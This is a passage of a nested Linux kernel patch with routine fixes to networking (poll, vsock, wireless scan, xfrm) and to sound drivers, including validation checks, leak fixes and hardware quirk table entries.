+ 	struct sock *sk = sock->sk, *other;
+ 	unsigned int writable;
+ 	__poll_t mask;
++	u8 shutdown;
+ 
+ 	sock_poll_wait(file, sock, wait);
+ 	mask = 0;
++	shutdown = READ_ONCE(sk->sk_shutdown);
+ 
+ 	/* exceptional events? */
+ 	if (sk->sk_err || !skb_queue_empty_lockless(&sk->sk_error_queue))
+ 		mask |= EPOLLERR |
+ 			(sock_flag(sk, SOCK_SELECT_ERR_QUEUE) ? EPOLLPRI : 0);
+ 
+-	if (sk->sk_shutdown & RCV_SHUTDOWN)
++	if (shutdown & RCV_SHUTDOWN)
+ 		mask |= EPOLLRDHUP | EPOLLIN | EPOLLRDNORM;
+-	if (sk->sk_shutdown == SHUTDOWN_MASK)
++	if (shutdown == SHUTDOWN_MASK)
+ 		mask |= EPOLLHUP;
+ 
+ 	/* readable? */
+diff --git a/net/vmw_vsock/af_vsock.c b/net/vmw_vsock/af_vsock.c
+index 884eca7f6743a..8360c790a8a01 100644
+--- a/net/vmw_vsock/af_vsock.c
++++ b/net/vmw_vsock/af_vsock.c
+@@ -1427,7 +1427,7 @@ static int vsock_connect(struct socket *sock, struct sockaddr *addr,
+ 			vsock_transport_cancel_pkt(vsk);
+ 			vsock_remove_connected(vsk);
+ 			goto out_wait;
+-		} else if (timeout == 0) {
++		} else if ((sk->sk_state != TCP_ESTABLISHED) && (timeout == 0)) {
+ 			err = -ETIMEDOUT;
+ 			sk->sk_state = TCP_CLOSE;
+ 			sock->state = SS_UNCONNECTED;
+diff --git a/net/wireless/scan.c b/net/wireless/scan.c
+index 3d86482e83f51..6c2b73c0d36e8 100644
+--- a/net/wireless/scan.c
++++ b/net/wireless/scan.c
+@@ -5,7 +5,7 @@
+  * Copyright 2008 Johannes Berg <johannes@sipsolutions.net>
+  * Copyright 2013-2014  Intel Mobile Communications GmbH
+  * Copyright 2016	Intel Deutschland GmbH
+- * Copyright (C) 2018-2022 Intel Corporation
++ * Copyright (C) 2018-2023 Intel Corporation
+  */
+ #include <linux/kernel.h>
+ #include <linux/slab.h>
+@@ -543,6 +543,10 @@ static int cfg80211_parse_ap_info(struct cfg80211_colocated_ap *entry,
+ 	/* skip the TBTT offset */
+ 	pos++;
+ 
++	/* ignore entries with invalid BSSID */
++	if (!is_valid_ether_addr(pos))
++		return -EINVAL;
++
+ 	memcpy(entry->bssid, pos, ETH_ALEN);
+ 	pos += ETH_ALEN;
+ 
+diff --git a/net/xfrm/xfrm_interface.c b/net/xfrm/xfrm_interface.c
+index 94a3609548b11..5a67b120c4dbd 100644
+--- a/net/xfrm/xfrm_interface.c
++++ b/net/xfrm/xfrm_interface.c
+@@ -310,52 +310,6 @@ static void xfrmi_scrub_packet(struct sk_buff *skb, bool xnet)
+ 	skb->mark = 0;
+ }
+ 
+-static int xfrmi_input(struct sk_buff *skb, int nexthdr, __be32 spi,
+-		       int encap_type, unsigned short family)
+-{
+-	struct sec_path *sp;
+-
+-	sp = skb_sec_path(skb);
+-	if (sp && (sp->len || sp->olen) &&
+-	    !xfrm_policy_check(NULL, XFRM_POLICY_IN, skb, family))
+-		goto discard;
+-
+-	XFRM_SPI_SKB_CB(skb)->family = family;
+-	if (family == AF_INET) {
+-		XFRM_SPI_SKB_CB(skb)->daddroff = offsetof(struct iphdr, daddr);
+-		XFRM_TUNNEL_SKB_CB(skb)->tunnel.ip4 = NULL;
+-	} else {
+-		XFRM_SPI_SKB_CB(skb)->daddroff = offsetof(struct ipv6hdr, daddr);
+-		XFRM_TUNNEL_SKB_CB(skb)->tunnel.ip6 = NULL;
+-	}
+-
+-	return xfrm_input(skb, nexthdr, spi, encap_type);
+-discard:
+-	kfree_skb(skb);
+-	return 0;
+-}
+-
+-static int xfrmi4_rcv(struct sk_buff *skb)
+-{
+-	return xfrmi_input(skb, ip_hdr(skb)->protocol, 0, 0, AF_INET);
+-}
+-
+-static int xfrmi6_rcv(struct sk_buff *skb)
+-{
+-	return xfrmi_input(skb, skb_network_header(skb)[IP6CB(skb)->nhoff],
+-			   0, 0, AF_INET6);
+-}
+-
+-static int xfrmi4_input(struct sk_buff *skb, int nexthdr, __be32 spi, int encap_type)
+-{
+-	return xfrmi_input(skb, nexthdr, spi, encap_type, AF_INET);
+-}
+-
+-static int xfrmi6_input(struct sk_buff *skb, int nexthdr, __be32 spi, int encap_type)
+-{
+-	return xfrmi_input(skb, nexthdr, spi, encap_type, AF_INET6);
+-}
+-
+ static int xfrmi_rcv_cb(struct sk_buff *skb, int err)
+ {
+ 	const struct xfrm_mode *inner_mode;
+@@ -983,8 +937,8 @@ static struct pernet_operations xfrmi_net_ops = {
+ };
+ 
+ static struct xfrm6_protocol xfrmi_esp6_protocol __read_mostly = {
+-	.handler	=	xfrmi6_rcv,
+-	.input_handler	=	xfrmi6_input,
++	.handler	=	xfrm6_rcv,
++	.input_handler	=	xfrm_input,
+ 	.cb_handler	=	xfrmi_rcv_cb,
+ 	.err_handler	=	xfrmi6_err,
+ 	.priority	=	10,
+@@ -1034,8 +988,8 @@ static struct xfrm6_tunnel xfrmi_ip6ip_handler __read_mostly = {
+ #endif
+ 
+ static struct xfrm4_protocol xfrmi_esp4_protocol __read_mostly = {
+-	.handler	=	xfrmi4_rcv,
+-	.input_handler	=	xfrmi4_input,
++	.handler	=	xfrm4_rcv,
++	.input_handler	=	xfrm_input,
+ 	.cb_handler	=	xfrmi_rcv_cb,
+ 	.err_handler	=	xfrmi4_err,
+ 	.priority	=	10,
+diff --git a/net/xfrm/xfrm_policy.c b/net/xfrm/xfrm_policy.c
+index 7f49dab3b6b59..bc04cb83215f9 100644
+--- a/net/xfrm/xfrm_policy.c
++++ b/net/xfrm/xfrm_policy.c
+@@ -3637,12 +3637,6 @@ int __xfrm_policy_check(struct sock *sk, int dir, struct sk_buff *skb,
+ 		}
+ 		xfrm_nr = ti;
+ 
+-		if (net->xfrm.policy_default[dir] == XFRM_USERPOLICY_BLOCK &&
+-		    !xfrm_nr) {
+-			XFRM_INC_STATS(net, LINUX_MIB_XFRMINNOSTATES);
+-			goto reject;
+-		}
+-
+ 		if (npols > 1) {
+ 			xfrm_tmpl_sort(stp, tpp, xfrm_nr, family);
+ 			tpp = stp;
+@@ -3670,9 +3664,6 @@ int __xfrm_policy_check(struct sock *sk, int dir, struct sk_buff *skb,
+ 			goto reject;
+ 		}
+ 
+-		if (if_id)
+-			secpath_reset(skb);
+-
+ 		xfrm_pols_put(pols, npols);
+ 		return 1;
+ 	}
+diff --git a/net/xfrm/xfrm_user.c b/net/xfrm/xfrm_user.c
+index 83f35ecacf24f..2d68a173b2273 100644
+--- a/net/xfrm/xfrm_user.c
++++ b/net/xfrm/xfrm_user.c
+@@ -1743,7 +1743,7 @@ static void copy_templates(struct xfrm_policy *xp, struct xfrm_user_tmpl *ut,
+ }
+ 
+ static int validate_tmpl(int nr, struct xfrm_user_tmpl *ut, u16 family,
+-			 struct netlink_ext_ack *extack)
++			 int dir, struct netlink_ext_ack *extack)
+ {
+ 	u16 prev_family;
+ 	int i;
+@@ -1769,6 +1769,10 @@ static int validate_tmpl(int nr, struct xfrm_user_tmpl *ut, u16 family,
+ 		switch (ut[i].mode) {
+ 		case XFRM_MODE_TUNNEL:
+ 		case XFRM_MODE_BEET:
++			if (ut[i].optional && dir == XFRM_POLICY_OUT) {
++				NL_SET_ERR_MSG(extack, "Mode in optional template not allowed in outbound policy");
++				return -EINVAL;
++			}
+ 			break;
+ 		default:
+ 			if (ut[i].family != prev_family) {
+@@ -1806,7 +1810,7 @@ static int validate_tmpl(int nr, struct xfrm_user_tmpl *ut, u16 family,
+ }
+ 
+ static int copy_from_user_tmpl(struct xfrm_policy *pol, struct nlattr **attrs,
+-			       struct netlink_ext_ack *extack)
++			       int dir, struct netlink_ext_ack *extack)
+ {
+ 	struct nlattr *rt = attrs[XFRMA_TMPL];
+ 
+@@ -1817,7 +1821,7 @@ static int copy_from_user_tmpl(struct xfrm_policy *pol, struct nlattr **attrs,
+ 		int nr = nla_len(rt) / sizeof(*utmpl);
+ 		int err;
+ 
+-		err = validate_tmpl(nr, utmpl, pol->family, extack);
++		err = validate_tmpl(nr, utmpl, pol->family, dir, extack);
+ 		if (err)
+ 			return err;
+ 
+@@ -1894,7 +1898,7 @@ static struct xfrm_policy *xfrm_policy_construct(struct net *net,
+ 	if (err)
+ 		goto error;
+ 
+-	if (!(err = copy_from_user_tmpl(xp, attrs, extack)))
++	if (!(err = copy_from_user_tmpl(xp, attrs, p->dir, extack)))
+ 		err = copy_from_user_sec_ctx(xp, attrs);
+ 	if (err)
+ 		goto error;
+@@ -3443,7 +3447,7 @@ static struct xfrm_policy *xfrm_compile_policy(struct sock *sk, int opt,
+ 		return NULL;
+ 
+ 	nr = ((len - sizeof(*p)) / sizeof(*ut));
+-	if (validate_tmpl(nr, ut, p->sel.family, NULL))
++	if (validate_tmpl(nr, ut, p->sel.family, p->dir, NULL))
+ 		return NULL;
+ 
+ 	if (p->dir > XFRM_POLICY_OUT)
+diff --git a/samples/bpf/hbm.c b/samples/bpf/hbm.c
+index 516fbac28b716..7f89700a17b69 100644
+--- a/samples/bpf/hbm.c
++++ b/samples/bpf/hbm.c
+@@ -315,6 +315,7 @@ static int run_bpf_prog(char *prog, int cg_id)
+ 		fout = fopen(fname, "w");
+ 		fprintf(fout, "id:%d\n", cg_id);
+ 		fprintf(fout, "ERROR: Could not lookup queue_stats\n");
++		fclose(fout);
+ 	} else if (stats_flag && qstats.lastPacketTime >
+ 		   qstats.firstPacketTime) {
+ 		long long delta_us = (qstats.lastPacketTime -
+diff --git a/scripts/recordmcount.c b/scripts/recordmcount.c
+index cce12e1971d85..ec692af8ce9eb 100644
+--- a/scripts/recordmcount.c
++++ b/scripts/recordmcount.c
+@@ -102,6 +102,7 @@ static ssize_t uwrite(void const *const buf, size_t const count)
+ {
+ 	size_t cnt = count;
+ 	off_t idx = 0;
++	void *p = NULL;
+ 
+ 	file_updated = 1;
+ 
+@@ -109,7 +110,10 @@ static ssize_t uwrite(void const *const buf, size_t const count)
+ 		off_t aoffset = (file_ptr + count) - file_end;
+ 
+ 		if (aoffset > file_append_size) {
+-			file_append = realloc(file_append, aoffset);
++			p = realloc(file_append, aoffset);
++			if (!p)
++				free(file_append);
++			file_append = p;
+ 			file_append_size = aoffset;
+ 		}
+ 		if (!file_append) {
+diff --git a/sound/firewire/digi00x/digi00x-stream.c b/sound/firewire/digi00x/digi00x-stream.c
+index a15f55b0dce37..295163bb8abb6 100644
+--- a/sound/firewire/digi00x/digi00x-stream.c
++++ b/sound/firewire/digi00x/digi00x-stream.c
+@@ -259,8 +259,10 @@ int snd_dg00x_stream_init_duplex(struct snd_dg00x *dg00x)
+ 		return err;
+ 
+ 	err = init_stream(dg00x, &dg00x->tx_stream);
+-	if (err < 0)
++	if (err < 0) {
+ 		destroy_stream(dg00x, &dg00x->rx_stream);
++		return err;
++	}
+ 
+ 	err = amdtp_domain_init(&dg00x->domain);
+ 	if (err < 0) {
+diff --git a/sound/pci/hda/hda_generic.c b/sound/pci/hda/hda_generic.c
+index fc114e5224806..dbf7aa88e0e31 100644
+--- a/sound/pci/hda/hda_generic.c
++++ b/sound/pci/hda/hda_generic.c
+@@ -1155,8 +1155,8 @@ static bool path_has_mixer(struct hda_codec *codec, int path_idx, int ctl_type)
+ 	return path && path->ctls[ctl_type];
+ }
+ 
+-static const char * const channel_name[4] = {
+-	"Front", "Surround", "CLFE", "Side"
++static const char * const channel_name[] = {
++	"Front", "Surround", "CLFE", "Side", "Back",
+ };
+ 
+ /* give some appropriate ctl name prefix for the given line out channel */
+@@ -1182,7 +1182,7 @@ static const char *get_line_out_pfx(struct hda_codec *codec, int ch,
+ 
+ 	/* multi-io channels */
+ 	if (ch >= cfg->line_outs)
+-		return channel_name[ch];
++		goto fixed_name;
+ 
+ 	switch (cfg->line_out_type) {
+ 	case AUTO_PIN_SPEAKER_OUT:
+@@ -1234,6 +1234,7 @@ static const char *get_line_out_pfx(struct hda_codec *codec, int ch,
+ 	if (cfg->line_outs == 1 && !spec->multi_ios)
+ 		return "Line Out";
+ 
++ fixed_name:
+ 	if (ch >= ARRAY_SIZE(channel_name)) {
+ 		snd_BUG();
+ 		return "PCM";
+diff --git a/sound/pci/hda/hda_intel.c b/sound/pci/hda/hda_intel.c
+index 77a592f219472..881b2f3a1551f 100644
+--- a/sound/pci/hda/hda_intel.c
++++ b/sound/pci/hda/hda_intel.c
+@@ -2528,6 +2528,9 @@ static const struct pci_device_id azx_ids[] = {
+ 	/* Meteorlake-P */
+ 	{ PCI_DEVICE(0x8086, 0x7e28),
+ 	  .driver_data = AZX_DRIVER_SKL | AZX_DCAPS_INTEL_SKYLAKE},
++	/* Lunarlake-P */
++	{ PCI_DEVICE(0x8086, 0xa828),
++	  .driver_data = AZX_DRIVER_SKL | AZX_DCAPS_INTEL_SKYLAKE},
+ 	/* Broxton-P(Apollolake) */
+ 	{ PCI_DEVICE(0x8086, 0x5a98),
+ 	  .driver_data = AZX_DRIVER_SKL | AZX_DCAPS_INTEL_BROXTON },
+diff --git a/sound/pci/hda/patch_hdmi.c b/sound/pci/hda/patch_hdmi.c
+index 5c6980394dcec..be2c6cff77011 100644
+--- a/sound/pci/hda/patch_hdmi.c
++++ b/sound/pci/hda/patch_hdmi.c
+@@ -4577,6 +4577,11 @@ HDA_CODEC_ENTRY(0x10de009d, "GPU 9d HDMI/DP",	patch_nvhdmi),
+ HDA_CODEC_ENTRY(0x10de009e, "GPU 9e HDMI/DP",	patch_nvhdmi),
+ HDA_CODEC_ENTRY(0x10de009f, "GPU 9f HDMI/DP",	patch_nvhdmi),
+ HDA_CODEC_ENTRY(0x10de00a0, "GPU a0 HDMI/DP",	patch_nvhdmi),
++HDA_CODEC_ENTRY(0x10de00a3, "GPU a3 HDMI/DP",	patch_nvhdmi),
++HDA_CODEC_ENTRY(0x10de00a4, "GPU a4 HDMI/DP",	patch_nvhdmi),
++HDA_CODEC_ENTRY(0x10de00a5, "GPU a5 HDMI/DP",	patch_nvhdmi),
++HDA_CODEC_ENTRY(0x10de00a6, "GPU a6 HDMI/DP",	patch_nvhdmi),
++HDA_CODEC_ENTRY(0x10de00a7, "GPU a7 HDMI/DP",	patch_nvhdmi),
+ HDA_CODEC_ENTRY(0x10de8001, "MCP73 HDMI",	patch_nvhdmi_2ch),
+ HDA_CODEC_ENTRY(0x10de8067, "MCP67/68 HDMI",	patch_nvhdmi_2ch),
+ HDA_CODEC_ENTRY(0x11069f80, "VX900 HDMI/DP",	patch_via_hdmi),
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index 172ffc2c332b7..c757607177368 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -9363,7 +9363,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x802f, "HP Z240", ALC221_FIXUP_HP_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x103c, 0x8077, "HP", ALC256_FIXUP_HP_HEADSET_MIC),
+ 	SND_PCI_QUIRK(0x103c, 0x8158, "HP", ALC256_FIXUP_HP_HEADSET_MIC),
+-	SND_PCI_QUIRK(0x103c, 0x820d, "HP Pavilion 15", ALC269_FIXUP_HP_MUTE_LED_MIC3),
++	SND_PCI_QUIRK(0x103c, 0x820d, "HP Pavilion 15", ALC295_FIXUP_HP_X360),
+ 	SND_PCI_QUIRK(0x103c, 0x8256, "HP", ALC221_FIXUP_HP_FRONT_MIC),
+ 	SND_PCI_QUIRK(0x103c, 0x827e, "HP x360", ALC295_FIXUP_HP_X360),
+ 	SND_PCI_QUIRK(0x103c, 0x827f, "HP x360", ALC269_FIXUP_HP_MUTE_LED_MIC3),
+@@ -9458,7 +9458,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x8aa3, "HP ProBook 450 G9 (MB 8AA1)", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8aa8, "HP EliteBook 640 G9 (MB 8AA6)", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8aab, "HP EliteBook 650 G9 (MB 8AA9)", ALC236_FIXUP_HP_GPIO_LED),
+-	 SND_PCI_QUIRK(0x103c, 0x8abb, "HP ZBook Firefly 14 G9", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
++	SND_PCI_QUIRK(0x103c, 0x8abb, "HP ZBook Firefly 14 G9", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8ad1, "HP EliteBook 840 14 inch G9 Notebook PC", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8ad2, "HP EliteBook 860 16 inch G9 Notebook PC", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b42, "HP", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+@@ -9469,8 +9469,13 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x8b47, "HP", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b5d, "HP", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
+ 	SND_PCI_QUIRK(0x103c, 0x8b5e, "HP", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
++	SND_PCI_QUIRK(0x103c, 0x8b63, "HP Elite Dragonfly 13.5 inch G4", ALC245_FIXUP_CS35L41_SPI_4_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b65, "HP ProBook 455 15.6 inch G10 Notebook PC", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
+ 	SND_PCI_QUIRK(0x103c, 0x8b66, "HP", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
++	SND_PCI_QUIRK(0x103c, 0x8b70, "HP EliteBook 835 G10", ALC287_FIXUP_CS35L41_I2C_2),
++	SND_PCI_QUIRK(0x103c, 0x8b72, "HP EliteBook 845 G10", ALC287_FIXUP_CS35L41_I2C_2),
++	SND_PCI_QUIRK(0x103c, 0x8b74, "HP EliteBook 845W G10", ALC287_FIXUP_CS35L41_I2C_2),
++	SND_PCI_QUIRK(0x103c, 0x8b77, "HP ElieBook 865 G10", ALC287_FIXUP_CS35L41_I2C_2),
+ 	SND_PCI_QUIRK(0x103c, 0x8b7a, "HP", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b7d, "HP", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b87, "HP", ALC236_FIXUP_HP_GPIO_LED),
+@@ -9480,7 +9485,9 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x8b8f, "HP", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b92, "HP", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b96, "HP", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
++	SND_PCI_QUIRK(0x103c, 0x8b97, "HP", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
+ 	SND_PCI_QUIRK(0x103c, 0x8bf0, "HP", ALC236_FIXUP_HP_GPIO_LED),
++	SND_PCI_QUIRK(0x103c, 0x8c26, "HP HP EliteBook 800G11", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x1043, 0x103e, "ASUS X540SA", ALC256_FIXUP_ASUS_MIC),
+ 	SND_PCI_QUIRK(0x1043, 0x103f, "ASUS TX300", ALC282_FIXUP_ASUS_TX300),
+ 	SND_PCI_QUIRK(0x1043, 0x106d, "Asus K53BE", ALC269_FIXUP_LIMIT_INT_MIC_BOOST),
+@@ -9522,6 +9529,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1043, 0x1b13, "Asus U41SV", ALC269_FIXUP_INV_DMIC),
+ 	SND_PCI_QUIRK(0x1043, 0x1bbd, "ASUS Z550MA", ALC255_FIXUP_ASUS_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1043, 0x1c23, "Asus X55U", ALC269_FIXUP_LIMIT_INT_MIC_BOOST),
++	SND_PCI_QUIRK(0x1043, 0x1c62, "ASUS GU603", ALC289_FIXUP_ASUS_GA401),
+ 	SND_PCI_QUIRK(0x1043, 0x1c92, "ASUS ROG Strix G15", ALC285_FIXUP_ASUS_G533Z_PINS),
+ 	SND_PCI_QUIRK(0x1043, 0x1ccd, "ASUS X555UB", ALC256_FIXUP_ASUS_MIC),
+ 	SND_PCI_QUIRK(0x1043, 0x1d42, "ASUS Zephyrus G14 2022", ALC289_FIXUP_ASUS_GA401),
+@@ -9618,6 +9626,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1558, 0x7716, "Clevo NS50PU", ALC256_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1558, 0x7717, "Clevo NS70PU", ALC256_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1558, 0x7718, "Clevo L140PU", ALC256_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
++	SND_PCI_QUIRK(0x1558, 0x7724, "Clevo L140AU", ALC256_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1558, 0x8228, "Clevo NR40BU", ALC293_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1558, 0x8520, "Clevo NH50D[CD]", ALC293_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1558, 0x8521, "Clevo NH77D[CD]", ALC293_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+@@ -11663,6 +11672,7 @@ static const struct snd_pci_quirk alc662_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x1632, "HP RP5800", ALC662_FIXUP_HP_RP5800),
+ 	SND_PCI_QUIRK(0x103c, 0x870c, "HP", ALC897_FIXUP_HP_HSMIC_VERB),
+ 	SND_PCI_QUIRK(0x103c, 0x8719, "HP", ALC897_FIXUP_HP_HSMIC_VERB),
++	SND_PCI_QUIRK(0x103c, 0x872b, "HP", ALC897_FIXUP_HP_HSMIC_VERB),
+ 	SND_PCI_QUIRK(0x103c, 0x873e, "HP", ALC671_FIXUP_HP_HEADSET_MIC2),
+ 	SND_PCI_QUIRK(0x103c, 0x877e, "HP 288 Pro G6", ALC671_FIXUP_HP_HEADSET_MIC2),
+ 	SND_PCI_QUIRK(0x103c, 0x885f, "HP 288 Pro G8", ALC671_FIXUP_HP_HEADSET_MIC2),
+diff --git a/sound/soc/amd/yc/acp6x-mach.c b/sound/soc/amd/yc/acp6x-mach.c
+index 0acdf0156f075..b9958e5553674 100644
+--- a/sound/soc/amd/yc/acp6x-mach.c
++++ b/sound/soc/amd/yc/acp6x-mach.c
+@@ -45,6 +45,13 @@ static struct snd_soc_card acp6x_card = {
+ };
+ 
+ static const struct dmi_system_id yc_acp_quirk_table[] = {
++	{
++		.driver_data = &acp6x_card,
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "Dell Inc."),
++			DMI_MATCH(DMI_PRODUCT_NAME, "Dell G15 5525"),
++		}
++	},
+ 	{
+ 		.driver_data = &acp6x_card,
+ 		.matches = {
+@@ -178,6 +185,13 @@ static const struct dmi_system_id yc_acp_quirk_table[] = {
+ 			DMI_MATCH(DMI_PRODUCT_NAME, "21EN"),
+ 		}
+ 	},
++	{
++		.driver_data = &acp6x_card,
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "LENOVO"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "21HY"),
++		}
++	},
+ 	{
+ 		.driver_data = &acp6x_card,
+ 		.matches = {
+@@ -262,6 +276,13 @@ static const struct dmi_system_id yc_acp_quirk_table[] = {
+ 			DMI_MATCH(DMI_PRODUCT_NAME, "OMEN by HP Gaming Laptop 16z-n000"),
+ 		}
+ 	},
++	{
++		.driver_data = &acp6x_card,
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "HP"),
++			DMI_MATCH(DMI_BOARD_NAME, "8A42"),
++		}
++	},
+ 	{
+ 		.driver_data = &acp6x_card,
+ 		.matches = {
+diff --git a/sound/soc/fsl/fsl_micfil.c b/sound/soc/fsl/fsl_micfil.c
+index 4b8fe9b8be407..3a03f49452fa3 100644
+--- a/sound/soc/fsl/fsl_micfil.c
++++ b/sound/soc/fsl/fsl_micfil.c
+@@ -712,7 +712,7 @@ static int fsl_micfil_probe(struct platform_device *pdev)
+ 	ret = devm_snd_dmaengine_pcm_register(&pdev->dev, NULL, 0);
+ 	if (ret) {
+ 		dev_err(&pdev->dev, "failed to pcm register\n");
+-		return ret;
++		goto err_pm_disable;
+ 	}
+ 
+ 	fsl_micfil_dai.capture.formats = micfil->soc->formats;
+@@ -722,9 +722,20 @@ static int fsl_micfil_probe(struct platform_device *pdev)
+ 	if (ret) {
+ 		dev_err(&pdev->dev, "failed to register component %s\n",
+ 			fsl_micfil_component.name);
++		goto err_pm_disable;
+ 	}
+ 
+ 	return ret;
++
++err_pm_disable:
++	pm_runtime_disable(&pdev->dev);
++
++	return ret;
++}
++
++static void fsl_micfil_remove(struct platform_device *pdev)
++{
++	pm_runtime_disable(&pdev->dev);
+ }
+ 
+ static int __maybe_unused fsl_micfil_runtime_suspend(struct device *dev)
+@@ -785,6 +796,7 @@ static const struct dev_pm_ops fsl_micfil_pm_ops = {
+ 
+ static struct platform_driver fsl_micfil_driver = {
+ 	.probe = fsl_micfil_probe,
++	.remove_new = fsl_micfil_remove,
+ 	.driver = {
+ 		.name = "fsl-micfil-dai",
+ 		.pm = &fsl_micfil_pm_ops,
+diff --git a/sound/soc/mediatek/mt8186/mt8186-afe-clk.c b/sound/soc/mediatek/mt8186/mt8186-afe-clk.c
+index a6b4f29049bbc..539e3a023bc4e 100644
+--- a/sound/soc/mediatek/mt8186/mt8186-afe-clk.c
++++ b/sound/soc/mediatek/mt8186/mt8186-afe-clk.c
+@@ -644,9 +644,3 @@ int mt8186_init_clock(struct mtk_base_afe *afe)
+ 
+ 	return 0;
+ }
+-
+-void mt8186_deinit_clock(void *priv)
+-{
+-	struct mtk_base_afe *afe = priv;
+-	mt8186_audsys_clk_unregister(afe);
+-}
+diff --git a/sound/soc/mediatek/mt8186/mt8186-afe-clk.h b/sound/soc/mediatek/mt8186/mt8186-afe-clk.h
+index d5988717d8f2d..a9d59e506d9af 100644
+--- a/sound/soc/mediatek/mt8186/mt8186-afe-clk.h
++++ b/sound/soc/mediatek/mt8186/mt8186-afe-clk.h
+@@ -81,7 +81,6 @@ enum {
+ struct mtk_base_afe;
+ int mt8186_set_audio_int_bus_parent(struct mtk_base_afe *afe, int clk_id);
+ int mt8186_init_clock(struct mtk_base_afe *afe);
+-void mt8186_deinit_clock(void *priv);
+ int mt8186_afe_enable_cgs(struct mtk_base_afe *afe);
+ void mt8186_afe_disable_cgs(struct mtk_base_afe *afe);
+ int mt8186_afe_enable_clock(struct mtk_base_afe *afe);
+diff --git a/sound/soc/mediatek/mt8186/mt8186-afe-pcm.c b/sound/soc/mediatek/mt8186/mt8186-afe-pcm.c
+index d7e94e6a19c70..0e3792ccd49f6 100644
+--- a/sound/soc/mediatek/mt8186/mt8186-afe-pcm.c
++++ b/sound/soc/mediatek/mt8186/mt8186-afe-pcm.c
+@@ -2847,10 +2847,6 @@ static int mt8186_afe_pcm_dev_probe(struct platform_device *pdev)
+ 		return ret;
+ 	}
+ 
+-	ret = devm_add_action_or_reset(dev, mt8186_deinit_clock, (void *)afe);
+-	if (ret)
+-		return ret;
+-
+ 	/* init memif */
+ 	afe->memif_32bit_supported = 0;
+ 	afe->memif_size = MT8186_MEMIF_NUM;
+diff --git a/sound/soc/mediatek/mt8186/mt8186-audsys-clk.c b/sound/soc/mediatek/mt8186/mt8186-audsys-clk.c
+index 578969ca91c8e..5666be6b1bd2e 100644
+--- a/sound/soc/mediatek/mt8186/mt8186-audsys-clk.c
++++ b/sound/soc/mediatek/mt8186/mt8186-audsys-clk.c
+@@ -84,6 +84,29 @@ static const struct afe_gate aud_clks[CLK_AUD_NR_CLK] = {
+ 	GATE_AUD2(CLK_AUD_ETDM_OUT1_BCLK, "aud_etdm_out1_bclk", "top_audio", 24),
+ };
+ 
++static void mt8186_audsys_clk_unregister(void *data)
++{
++	struct mtk_base_afe *afe = data;
++	struct mt8186_afe_private *afe_priv = afe->platform_priv;
++	struct clk *clk;
++	struct clk_lookup *cl;
++	int i;
++
++	if (!afe_priv)
++		return;
++
++	for (i = 0; i < CLK_AUD_NR_CLK; i++) {
++		cl = afe_priv->lookup[i];
++		if (!cl)
++			continue;
++
++		clk = cl->clk;
++		clk_unregister_gate(clk);
++
++		clkdev_drop(cl);
++	}
++}
++
+ int mt8186_audsys_clk_register(struct mtk_base_afe *afe)
+ {
+ 	struct mt8186_afe_private *afe_priv = afe->platform_priv;
+@@ -124,27 +147,6 @@ int mt8186_audsys_clk_register(struct mtk_base_afe *afe)
